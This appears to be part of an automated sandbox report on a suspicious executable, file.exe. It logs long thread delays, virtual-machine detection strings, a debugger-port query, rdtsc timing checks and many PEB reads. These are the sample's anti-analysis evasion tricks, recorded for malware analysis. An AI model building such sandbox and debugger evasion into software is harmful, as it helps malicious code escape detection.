                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99875Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99765Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99657Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99532Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99407Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99282Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99172Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99062Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98953Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98844Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98733Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98625Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98516Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98405Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98297Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98188Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98071Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 97932Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 97828Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 97719Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 97594Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 97485Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 97360Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 97235Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 97110Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 96985Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 96860Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 96735Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 96610Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 96485Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 96360Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 96235Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 96110Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 95985Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 95860Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 95735Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 95610Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 95335Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 95205Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 95078Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 94969Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 94860Jump to behavior
                  Source: file.exe, 00000000.00000002.2111813386.000000000274A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: file.exe, 00000000.00000002.2111813386.000000000274A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: file.exe, 00000000.00000002.2110427135.00000000008FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0169096E rdtsc 2_2_0169096E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00417983 LdrLoadDll,2_2_00417983
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E4144 mov eax, dword ptr fs:[00000030h]2_2_016E4144
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E4144 mov eax, dword ptr fs:[00000030h]2_2_016E4144
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E4144 mov ecx, dword ptr fs:[00000030h]2_2_016E4144
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E4144 mov eax, dword ptr fs:[00000030h]2_2_016E4144
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E4144 mov eax, dword ptr fs:[00000030h]2_2_016E4144
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01656154 mov eax, dword ptr fs:[00000030h]2_2_01656154
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01656154 mov eax, dword ptr fs:[00000030h]2_2_01656154
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164C156 mov eax, dword ptr fs:[00000030h]2_2_0164C156
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E8158 mov eax, dword ptr fs:[00000030h]2_2_016E8158
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01680124 mov eax, dword ptr fs:[00000030h]2_2_01680124
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FE10E mov eax, dword ptr fs:[00000030h]2_2_016FE10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FE10E mov ecx, dword ptr fs:[00000030h]2_2_016FE10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FE10E mov eax, dword ptr fs:[00000030h]2_2_016FE10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FE10E mov eax, dword ptr fs:[00000030h]2_2_016FE10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FE10E mov ecx, dword ptr fs:[00000030h]2_2_016FE10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FE10E mov eax, dword ptr fs:[00000030h]2_2_016FE10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FE10E mov eax, dword ptr fs:[00000030h]2_2_016FE10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FE10E mov ecx, dword ptr fs:[00000030h]2_2_016FE10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FE10E mov eax, dword ptr fs:[00000030h]2_2_016FE10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FE10E mov ecx, dword ptr fs:[00000030h]2_2_016FE10E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01710115 mov eax, dword ptr fs:[00000030h]2_2_01710115
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FA118 mov ecx, dword ptr fs:[00000030h]2_2_016FA118
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FA118 mov eax, dword ptr fs:[00000030h]2_2_016FA118
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FA118 mov eax, dword ptr fs:[00000030h]2_2_016FA118
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FA118 mov eax, dword ptr fs:[00000030h]2_2_016FA118
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016801F8 mov eax, dword ptr fs:[00000030h]2_2_016801F8
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_017261E5 mov eax, dword ptr fs:[00000030h]2_2_017261E5
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_017161C3 mov eax, dword ptr fs:[00000030h]2_2_017161C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_017161C3 mov eax, dword ptr fs:[00000030h]2_2_017161C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CE1D0 mov eax, dword ptr fs:[00000030h]2_2_016CE1D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CE1D0 mov eax, dword ptr fs:[00000030h]2_2_016CE1D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CE1D0 mov ecx, dword ptr fs:[00000030h]2_2_016CE1D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CE1D0 mov eax, dword ptr fs:[00000030h]2_2_016CE1D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CE1D0 mov eax, dword ptr fs:[00000030h]2_2_016CE1D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01690185 mov eax, dword ptr fs:[00000030h]2_2_01690185
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F4180 mov eax, dword ptr fs:[00000030h]2_2_016F4180
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F4180 mov eax, dword ptr fs:[00000030h]2_2_016F4180
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D019F mov eax, dword ptr fs:[00000030h]2_2_016D019F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D019F mov eax, dword ptr fs:[00000030h]2_2_016D019F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D019F mov eax, dword ptr fs:[00000030h]2_2_016D019F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D019F mov eax, dword ptr fs:[00000030h]2_2_016D019F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164A197 mov eax, dword ptr fs:[00000030h]2_2_0164A197
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164A197 mov eax, dword ptr fs:[00000030h]2_2_0164A197
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164A197 mov eax, dword ptr fs:[00000030h]2_2_0164A197
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0170C188 mov eax, dword ptr fs:[00000030h]2_2_0170C188
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0170C188 mov eax, dword ptr fs:[00000030h]2_2_0170C188
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167C073 mov eax, dword ptr fs:[00000030h]2_2_0167C073
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01652050 mov eax, dword ptr fs:[00000030h]2_2_01652050
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D6050 mov eax, dword ptr fs:[00000030h]2_2_016D6050
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164A020 mov eax, dword ptr fs:[00000030h]2_2_0164A020
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164C020 mov eax, dword ptr fs:[00000030h]2_2_0164C020
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E6030 mov eax, dword ptr fs:[00000030h]2_2_016E6030
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D4000 mov ecx, dword ptr fs:[00000030h]2_2_016D4000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F2000 mov eax, dword ptr fs:[00000030h]2_2_016F2000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F2000 mov eax, dword ptr fs:[00000030h]2_2_016F2000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F2000 mov eax, dword ptr fs:[00000030h]2_2_016F2000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F2000 mov eax, dword ptr fs:[00000030h]2_2_016F2000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F2000 mov eax, dword ptr fs:[00000030h]2_2_016F2000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F2000 mov eax, dword ptr fs:[00000030h]2_2_016F2000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F2000 mov eax, dword ptr fs:[00000030h]2_2_016F2000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F2000 mov eax, dword ptr fs:[00000030h]2_2_016F2000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166E016 mov eax, dword ptr fs:[00000030h]2_2_0166E016
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166E016 mov eax, dword ptr fs:[00000030h]2_2_0166E016
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166E016 mov eax, dword ptr fs:[00000030h]2_2_0166E016
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166E016 mov eax, dword ptr fs:[00000030h]2_2_0166E016
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0164A0E3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016580E9 mov eax, dword ptr fs:[00000030h]2_2_016580E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D60E0 mov eax, dword ptr fs:[00000030h]2_2_016D60E0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164C0F0 mov eax, dword ptr fs:[00000030h]2_2_0164C0F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016920F0 mov ecx, dword ptr fs:[00000030h]2_2_016920F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D20DE mov eax, dword ptr fs:[00000030h]2_2_016D20DE
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E80A8 mov eax, dword ptr fs:[00000030h]2_2_016E80A8
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_017160B8 mov eax, dword ptr fs:[00000030h]2_2_017160B8
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_017160B8 mov ecx, dword ptr fs:[00000030h]2_2_017160B8
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165208A mov eax, dword ptr fs:[00000030h]2_2_0165208A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F437C mov eax, dword ptr fs:[00000030h]2_2_016F437C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171A352 mov eax, dword ptr fs:[00000030h]2_2_0171A352
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]2_2_016D2349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]2_2_016D2349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]2_2_016D2349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]2_2_016D2349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]2_2_016D2349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]2_2_016D2349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]2_2_016D2349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]2_2_016D2349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]2_2_016D2349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]2_2_016D2349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]2_2_016D2349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]2_2_016D2349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]2_2_016D2349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]2_2_016D2349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D2349 mov eax, dword ptr fs:[00000030h]2_2_016D2349
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D035C mov eax, dword ptr fs:[00000030h]2_2_016D035C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D035C mov eax, dword ptr fs:[00000030h]2_2_016D035C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D035C mov eax, dword ptr fs:[00000030h]2_2_016D035C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D035C mov ecx, dword ptr fs:[00000030h]2_2_016D035C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D035C mov eax, dword ptr fs:[00000030h]2_2_016D035C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D035C mov eax, dword ptr fs:[00000030h]2_2_016D035C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F8350 mov ecx, dword ptr fs:[00000030h]2_2_016F8350
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168A30B mov eax, dword ptr fs:[00000030h]2_2_0168A30B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168A30B mov eax, dword ptr fs:[00000030h]2_2_0168A30B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168A30B mov eax, dword ptr fs:[00000030h]2_2_0168A30B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164C310 mov ecx, dword ptr fs:[00000030h]2_2_0164C310
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01670310 mov ecx, dword ptr fs:[00000030h]2_2_01670310
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016603E9 mov eax, dword ptr fs:[00000030h]2_2_016603E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016603E9 mov eax, dword ptr fs:[00000030h]2_2_016603E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016603E9 mov eax, dword ptr fs:[00000030h]2_2_016603E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016603E9 mov eax, dword ptr fs:[00000030h]2_2_016603E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016603E9 mov eax, dword ptr fs:[00000030h]2_2_016603E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016603E9 mov eax, dword ptr fs:[00000030h]2_2_016603E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016603E9 mov eax, dword ptr fs:[00000030h]2_2_016603E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016603E9 mov eax, dword ptr fs:[00000030h]2_2_016603E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166E3F0 mov eax, dword ptr fs:[00000030h]2_2_0166E3F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166E3F0 mov eax, dword ptr fs:[00000030h]2_2_0166E3F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166E3F0 mov eax, dword ptr fs:[00000030h]2_2_0166E3F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016863FF mov eax, dword ptr fs:[00000030h]2_2_016863FF
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165A3C0 mov eax, dword ptr fs:[00000030h]2_2_0165A3C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165A3C0 mov eax, dword ptr fs:[00000030h]2_2_0165A3C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165A3C0 mov eax, dword ptr fs:[00000030h]2_2_0165A3C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165A3C0 mov eax, dword ptr fs:[00000030h]2_2_0165A3C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165A3C0 mov eax, dword ptr fs:[00000030h]2_2_0165A3C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165A3C0 mov eax, dword ptr fs:[00000030h]2_2_0165A3C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016583C0 mov eax, dword ptr fs:[00000030h]2_2_016583C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016583C0 mov eax, dword ptr fs:[00000030h]2_2_016583C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016583C0 mov eax, dword ptr fs:[00000030h]2_2_016583C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016583C0 mov eax, dword ptr fs:[00000030h]2_2_016583C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D63C0 mov eax, dword ptr fs:[00000030h]2_2_016D63C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FE3DB mov eax, dword ptr fs:[00000030h]2_2_016FE3DB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FE3DB mov eax, dword ptr fs:[00000030h]2_2_016FE3DB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FE3DB mov ecx, dword ptr fs:[00000030h]2_2_016FE3DB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FE3DB mov eax, dword ptr fs:[00000030h]2_2_016FE3DB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F43D4 mov eax, dword ptr fs:[00000030h]2_2_016F43D4
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F43D4 mov eax, dword ptr fs:[00000030h]2_2_016F43D4
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0170C3CD mov eax, dword ptr fs:[00000030h]2_2_0170C3CD
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167438F mov eax, dword ptr fs:[00000030h]2_2_0167438F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167438F mov eax, dword ptr fs:[00000030h]2_2_0167438F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164E388 mov eax, dword ptr fs:[00000030h]2_2_0164E388
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164E388 mov eax, dword ptr fs:[00000030h]2_2_0164E388
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164E388 mov eax, dword ptr fs:[00000030h]2_2_0164E388
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01648397 mov eax, dword ptr fs:[00000030h]2_2_01648397
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01648397 mov eax, dword ptr fs:[00000030h]2_2_01648397
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01648397 mov eax, dword ptr fs:[00000030h]2_2_01648397
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]2_2_01700274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]2_2_01700274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]2_2_01700274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]2_2_01700274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]2_2_01700274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]2_2_01700274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]2_2_01700274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]2_2_01700274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]2_2_01700274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]2_2_01700274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]2_2_01700274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01700274 mov eax, dword ptr fs:[00000030h]2_2_01700274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01654260 mov eax, dword ptr fs:[00000030h]2_2_01654260
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01654260 mov eax, dword ptr fs:[00000030h]2_2_01654260
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01654260 mov eax, dword ptr fs:[00000030h]2_2_01654260
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164826B mov eax, dword ptr fs:[00000030h]2_2_0164826B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0170A250 mov eax, dword ptr fs:[00000030h]2_2_0170A250
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0170A250 mov eax, dword ptr fs:[00000030h]2_2_0170A250
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D8243 mov eax, dword ptr fs:[00000030h]2_2_016D8243
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D8243 mov ecx, dword ptr fs:[00000030h]2_2_016D8243
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164A250 mov eax, dword ptr fs:[00000030h]2_2_0164A250
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01656259 mov eax, dword ptr fs:[00000030h]2_2_01656259
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164823B mov eax, dword ptr fs:[00000030h]2_2_0164823B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016602E1 mov eax, dword ptr fs:[00000030h]2_2_016602E1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016602E1 mov eax, dword ptr fs:[00000030h]2_2_016602E1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016602E1 mov eax, dword ptr fs:[00000030h]2_2_016602E1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165A2C3 mov eax, dword ptr fs:[00000030h]2_2_0165A2C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165A2C3 mov eax, dword ptr fs:[00000030h]2_2_0165A2C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165A2C3 mov eax, dword ptr fs:[00000030h]2_2_0165A2C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165A2C3 mov eax, dword ptr fs:[00000030h]2_2_0165A2C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165A2C3 mov eax, dword ptr fs:[00000030h]2_2_0165A2C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016602A0 mov eax, dword ptr fs:[00000030h]2_2_016602A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016602A0 mov eax, dword ptr fs:[00000030h]2_2_016602A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E62A0 mov eax, dword ptr fs:[00000030h]2_2_016E62A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E62A0 mov ecx, dword ptr fs:[00000030h]2_2_016E62A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E62A0 mov eax, dword ptr fs:[00000030h]2_2_016E62A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E62A0 mov eax, dword ptr fs:[00000030h]2_2_016E62A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E62A0 mov eax, dword ptr fs:[00000030h]2_2_016E62A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E62A0 mov eax, dword ptr fs:[00000030h]2_2_016E62A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168E284 mov eax, dword ptr fs:[00000030h]2_2_0168E284
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168E284 mov eax, dword ptr fs:[00000030h]2_2_0168E284
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D0283 mov eax, dword ptr fs:[00000030h]2_2_016D0283
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D0283 mov eax, dword ptr fs:[00000030h]2_2_016D0283
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D0283 mov eax, dword ptr fs:[00000030h]2_2_016D0283
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168656A mov eax, dword ptr fs:[00000030h]2_2_0168656A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168656A mov eax, dword ptr fs:[00000030h]2_2_0168656A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168656A mov eax, dword ptr fs:[00000030h]2_2_0168656A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01658550 mov eax, dword ptr fs:[00000030h]2_2_01658550
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01658550 mov eax, dword ptr fs:[00000030h]2_2_01658550
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660535 mov eax, dword ptr fs:[00000030h]2_2_01660535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660535 mov eax, dword ptr fs:[00000030h]2_2_01660535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660535 mov eax, dword ptr fs:[00000030h]2_2_01660535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660535 mov eax, dword ptr fs:[00000030h]2_2_01660535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660535 mov eax, dword ptr fs:[00000030h]2_2_01660535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660535 mov eax, dword ptr fs:[00000030h]2_2_01660535
